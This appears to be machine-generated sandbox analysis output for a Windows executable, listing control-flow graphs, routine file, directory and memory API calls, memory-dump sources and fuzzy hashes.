                                        control_flow_graph 514 4015c1-4015d5 call 402d3e call 405ebc 519 401631-401634 514->519 520 4015d7-4015ea call 405e3e 514->520 522 401663-4022ee call 401423 519->522 523 401636-401655 call 401423 call 40653c SetCurrentDirectoryW 519->523 529 401604-401607 call 405af0 520->529 530 4015ec-4015ef 520->530 537 402bc2-402bd1 522->537 538 402925-40292c 522->538 523->537 541 40165b-40165e 523->541 539 40160c-40160e 529->539 530->529 531 4015f1-4015f8 call 405b0d 530->531 531->529 545 4015fa-401602 call 405a73 531->545 538->537 542 401610-401615 539->542 543 401627-40162f 539->543 541->537 546 401624 542->546 547 401617-401622 GetFileAttributesW 542->547 543->519 543->520 545->539 546->543 547->543 547->546
                                        APIs
                                          • Part of subcall function 00405EBC: CharNextW.USER32(?,?,00425F50,?,00405F30,00425F50,00425F50,74DF3420,?,74DF2EE0,00405C6E,?,74DF3420,74DF2EE0,00000000), ref: 00405ECA
                                          • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405ECF
                                          • Part of subcall function 00405EBC: CharNextW.USER32(00000000), ref: 00405EE7
                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                          • Part of subcall function 00405A73: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB6
                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 1892508949-47812868
                                        • Opcode ID: 005d403cdafa4537ab0cdd2ee316961fba708b28384a9191ff06090dfa321fd8
                                        • Instruction ID: 804c449170a8270e91f9515fbcc2e09aef6974e60d9951be020b7c668b26977e
                                        • Opcode Fuzzy Hash: 005d403cdafa4537ab0cdd2ee316961fba708b28384a9191ff06090dfa321fd8
                                        • Instruction Fuzzy Hash: 1511E231504115ABCF30AFA5CD4199F36B0EF24329B28493BE956B12F1D63E4E829F5E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 551 407090-407096 552 407098-40709a 551->552 553 40709b-4070b9 551->553 552->553 554 4072c7-4072dc 553->554 555 40738c-407399 553->555 557 4072f6-40730c 554->557 558 4072de-4072f4 554->558 556 4073c3-4073c7 555->556 559 407427-40743a 556->559 560 4073c9-4073ea 556->560 561 40730f-407316 557->561 558->561 564 407343-407349 559->564 562 407403-407416 560->562 563 4073ec-407401 560->563 565 407318-40731c 561->565 566 40733d 561->566 567 407419-407420 562->567 563->567 574 4074f6 564->574 575 406aee 564->575 568 407322-40733a 565->568 569 4074cb-4074d5 565->569 566->564 571 4073c0 567->571 572 407422 567->572 568->566 573 4074e1-4074f4 569->573 571->556 586 4073a5-4073bd 572->586 587 4074d7 572->587 577 4074f9-4074fd 573->577 574->577 578 406af5-406af9 575->578 579 406c35-406c56 575->579 580 406b9a-406b9e 575->580 581 406c0a-406c0e 575->581 578->573 588 406aff-406b0c 578->588 579->554 584 406ba4-406bbd 580->584 585 40744a-407454 580->585 582 406c14-406c28 581->582 583 407459-407463 581->583 589 406c2b-406c33 582->589 583->573 590 406bc0-406bc4 584->590 585->573 586->571 587->573 588->574 591 406b12-406b58 588->591 589->579 589->581 590->580 594 406bc6-406bcc 590->594 592 406b80-406b82 591->592 593 406b5a-406b5e 591->593 597 406b90-406b98 592->597 598 406b84-406b8e 592->598 595 406b60-406b63 GlobalFree 593->595 596 406b69-406b77 GlobalAlloc 593->596 599 406bf6-406c08 594->599 600 406bce-406bd5 594->600 595->596 596->574 601 406b7d 596->601 597->590 598->597 598->598 599->589 602 406be0-406bf0 GlobalAlloc 600->602 603 406bd7-406bda GlobalFree 600->603 601->592 602->574 602->599 603->602
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                        • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
                                        • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
                                        • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 604 407291-407295 605 4072b7-4072c4 604->605 606 407297-407399 604->606 608 4072c7-4072dc 605->608 614 4073c3-4073c7 606->614 610 4072f6-40730c 608->610 611 4072de-4072f4 608->611 612 40730f-407316 610->612 611->612 615 407318-40731c 612->615 616 40733d 612->616 617 407427-40743a 614->617 618 4073c9-4073ea 614->618 619 407322-40733a 615->619 620 4074cb-4074d5 615->620 621 407343-407349 616->621 617->621 622 407403-407416 618->622 623 4073ec-407401 618->623 619->616 625 4074e1-4074f4 620->625 628 4074f6 621->628 629 406aee 621->629 626 407419-407420 622->626 623->626 627 4074f9-4074fd 625->627 630 4073c0 626->630 631 407422 626->631 628->627 632 406af5-406af9 629->632 633 406c35-406c56 629->633 634 406b9a-406b9e 629->634 635 406c0a-406c0e 629->635 630->614 644 4073a5-4073bd 631->644 645 4074d7 631->645 632->625 641 406aff-406b0c 632->641 633->608 639 406ba4-406bbd 634->639 640 40744a-407454 634->640 636 406c14-406c28 635->636 637 407459-407463 635->637 642 406c2b-406c33 636->642 637->625 643 406bc0-406bc4 639->643 640->625 641->628 646 406b12-406b58 641->646 642->633 642->635 643->634 649 406bc6-406bcc 643->649 644->630 645->625 647 406b80-406b82 646->647 648 406b5a-406b5e 646->648 652 406b90-406b98 647->652 653 406b84-406b8e 647->653 650 406b60-406b63 GlobalFree 648->650 651 406b69-406b77 GlobalAlloc 648->651 654 406bf6-406c08 649->654 655 406bce-406bd5 649->655 650->651 651->628 656 406b7d 651->656 652->643 653->652 653->653 654->642 657 406be0-406bf0 GlobalAlloc 655->657 658 406bd7-406bda GlobalFree 655->658 656->647 657->628 657->654 658->657
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                        • Instruction ID: 5a24a20e97f266d7e3441ea32a969c72ce760fd7697c8a443cfa4f07d4855531
                                        • Opcode Fuzzy Hash: 5f17471a99a701cf31c58911c016ae07bdee3b17eca89a89cbbe770d5c4f1181
                                        • Instruction Fuzzy Hash: 6F911170D04229CBEF28CF98C854BADBBB1FB44305F14816ED856BB291C7786A86DF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 659 406fa7-406fab 660 406fb1-406fb5 659->660 661 407062-407071 659->661 662 4074f6 660->662 663 406fbb-406fcf 660->663 664 4072c7-4072dc 661->664 669 4074f9-4074fd 662->669 665 407495-40749f 663->665 666 406fd5-406fde 663->666 667 4072f6-40730c 664->667 668 4072de-4072f4 664->668 673 4074e1-4074f4 665->673 671 406fe0 666->671 672 406fe3-407013 666->672 670 40730f-407316 667->670 668->670 675 407318-40731c 670->675 676 40733d-407349 670->676 671->672 680 406adf-406ae8 672->680 673->669 677 407322-40733a 675->677 678 4074cb-4074d5 675->678 676->680 677->676 678->673 680->662 681 406aee 680->681 682 406af5-406af9 681->682 683 406c35-406c56 681->683 684 406b9a-406b9e 681->684 685 406c0a-406c0e 681->685 682->673 690 406aff-406b0c 682->690 683->664 688 406ba4-406bbd 684->688 689 40744a-407454 684->689 686 406c14-406c28 685->686 687 407459-407463 685->687 691 406c2b-406c33 686->691 687->673 692 406bc0-406bc4 688->692 689->673 690->662 693 406b12-406b58 690->693 691->683 691->685 692->684 696 406bc6-406bcc 692->696 694 406b80-406b82 693->694 695 406b5a-406b5e 693->695 699 406b90-406b98 694->699 700 406b84-406b8e 694->700 697 406b60-406b63 GlobalFree 695->697 698 406b69-406b77 GlobalAlloc 695->698 701 406bf6-406c08 696->701 702 406bce-406bd5 696->702 697->698 698->662 703 406b7d 698->703 699->692 700->699 700->700 701->691 704 406be0-406bf0 GlobalAlloc 702->704 705 406bd7-406bda GlobalFree 702->705 703->694 704->662 704->701 705->704
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                        • Instruction ID: f684c89e7032feabc3e3bde7c6855c560f6d73b68505d9943badace2bdbe07f8
                                        • Opcode Fuzzy Hash: 1e62c1466b9137082a982da4164a06349666531f21fbb12f17c8ad7a1ced7a97
                                        • Instruction Fuzzy Hash: CD814771D04228CFDF24CFA8C944BADBBB1FB44305F25816AD856BB281C7786986DF05

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 706 406aac-406acf 707 406ad1-406ad4 706->707 708 406ad9-406adc 706->708 710 4074f9-4074fd 707->710 709 406adf-406ae8 708->709 711 4074f6 709->711 712 406aee 709->712 711->710 713 406af5-406af9 712->713 714 406c35-4072dc 712->714 715 406b9a-406b9e 712->715 716 406c0a-406c0e 712->716 722 4074e1-4074f4 713->722 723 406aff-406b0c 713->723 726 4072f6-40730c 714->726 727 4072de-4072f4 714->727 720 406ba4-406bbd 715->720 721 40744a-407454 715->721 717 406c14-406c28 716->717 718 407459-407463 716->718 724 406c2b-406c33 717->724 718->722 725 406bc0-406bc4 720->725 721->722 722->710 723->711 728 406b12-406b58 723->728 724->714 724->716 725->715 732 406bc6-406bcc 725->732 731 40730f-407316 726->731 727->731 729 406b80-406b82 728->729 730 406b5a-406b5e 728->730 735 406b90-406b98 729->735 736 406b84-406b8e 729->736 733 406b60-406b63 GlobalFree 730->733 734 406b69-406b77 GlobalAlloc 730->734 739 407318-40731c 731->739 740 40733d-407349 731->740 737 406bf6-406c08 732->737 738 406bce-406bd5 732->738 733->734 734->711 744 406b7d 734->744 735->725 736->735 736->736 737->724 745 406be0-406bf0 GlobalAlloc 738->745 746 406bd7-406bda GlobalFree 738->746 741 407322-40733a 739->741 742 4074cb-4074d5 739->742 740->709 741->740 742->722 744->729 745->711 745->737 746->745
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                        • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
                                        • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
                                        • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 747 406efa-406efe 748 406f00-406f17 747->748 749 406f1c-406f5f 747->749 750 4072c7-4072dc 748->750 749->750 751 4072f6-40730c 750->751 752 4072de-4072f4 750->752 753 40730f-407316 751->753 752->753 754 407318-40731c 753->754 755 40733d-407349 753->755 756 407322-40733a 754->756 757 4074cb-4074d5 754->757 762 4074f6 755->762 763 406aee 755->763 756->755 760 4074e1-4074f4 757->760 761 4074f9-4074fd 760->761 762->761 764 406af5-406af9 763->764 765 406c35-406c56 763->765 766 406b9a-406b9e 763->766 767 406c0a-406c0e 763->767 764->760 772 406aff-406b0c 764->772 765->750 770 406ba4-406bbd 766->770 771 40744a-407454 766->771 768 406c14-406c28 767->768 769 407459-407463 767->769 773 406c2b-406c33 768->773 769->760 774 406bc0-406bc4 770->774 771->760 772->762 775 406b12-406b58 772->775 773->765 773->767 774->766 778 406bc6-406bcc 774->778 776 406b80-406b82 775->776 777 406b5a-406b5e 775->777 781 406b90-406b98 776->781 782 406b84-406b8e 776->782 779 406b60-406b63 GlobalFree 777->779 780 406b69-406b77 GlobalAlloc 777->780 783 406bf6-406c08 778->783 784 406bce-406bd5 778->784 779->780 780->762 785 406b7d 780->785 781->774 782->781 782->782 783->773 786 406be0-406bf0 GlobalAlloc 784->786 787 406bd7-406bda GlobalFree 784->787 785->776 786->762 786->783 787->786
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                        • Instruction ID: b4a429368d408adc735ccef7c69d02ca95e21b2dffe456e9be617d596e32585a
                                        • Opcode Fuzzy Hash: db5198ca4190c6b334929519d9078d0b7c25f309867be5a342d9eedfd0dff6d3
                                        • Instruction Fuzzy Hash: 44711371D04228CFDF28CFA8C954BADBBB1FB44305F15806AD856BB281D7386986DF45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                        • Instruction ID: ba5f555e51aa8b1381cdd2b0d2a1af6e0fef70f9c7cb40d8a5f6f768353cc961
                                        • Opcode Fuzzy Hash: afcc572d84cf9765722162092f48605f1f6e2a9c19f2086930970e637c6b8744
                                        • Instruction Fuzzy Hash: 30713371E04228CFDF28CFA8C854BADBBB1FB44305F15806AD856BB281C7786986DF45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                        • Instruction ID: ed69e48f2b9f224f5de76fa38221f26f69075a156c73166e2e17eecf637d197c
                                        • Opcode Fuzzy Hash: d487e76e05c5fffd88cdf5b3ac289b2a685634872410f3bf57cf9642bd44b422
                                        • Instruction Fuzzy Hash: B1714671E04228CFDF28CF98C854BADBBB1FB44305F15806AD856B7281C7786946DF45
                                        APIs
                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B2B
                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,0040394C,00000007,?,00000007,00000009,0000000B), ref: 00403B3F
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 2962429428-3081826266
                                        • Opcode ID: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                        • Instruction ID: f4960ab97bc4c8a2d82e21847187181e2840903b19b2aeb21d370a46e1c92408
                                        • Opcode Fuzzy Hash: f038386b1086bb30888fe0ccdba35b42973a9f6d5176726927d32f5153013f8e
                                        • Instruction Fuzzy Hash: 49E0863144471496C1346F7CAE49D853B285B4133A7204326F178F20F1C738A9574E9D
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                        • Instruction ID: 2e9f13adc1e302feb6e44b0cfdad9a37d499f26753b45a494d358932ab564816
                                        • Opcode Fuzzy Hash: d662c2adc7386def8032e0caa440f6f516c0d103e2adf936855243d12f81b3d3
                                        • Instruction Fuzzy Hash: 2501F431724220EBEB295B389D05B6A3698E710314F10857FF855F66F1E678CC029B6D
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                          • Part of subcall function 004068C1: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068D8
                                          • Part of subcall function 004068C1: wsprintfW.USER32 ref: 00406913
                                          • Part of subcall function 004068C1: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406927
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                        • Instruction ID: ca9fc7dfa89fe5ea16e4639455fc103decb8165a688e618dc96f0396de22bceb
                                        • Opcode Fuzzy Hash: a89557e88259ac32882439a66efe2bded2b7fe37332f597cb2162f61758b0433
                                        • Instruction Fuzzy Hash: A5E0867390422057E61056705E4CC3773A8ABC4750306443EF556F2140DB38DC35977A
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00406036
                                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
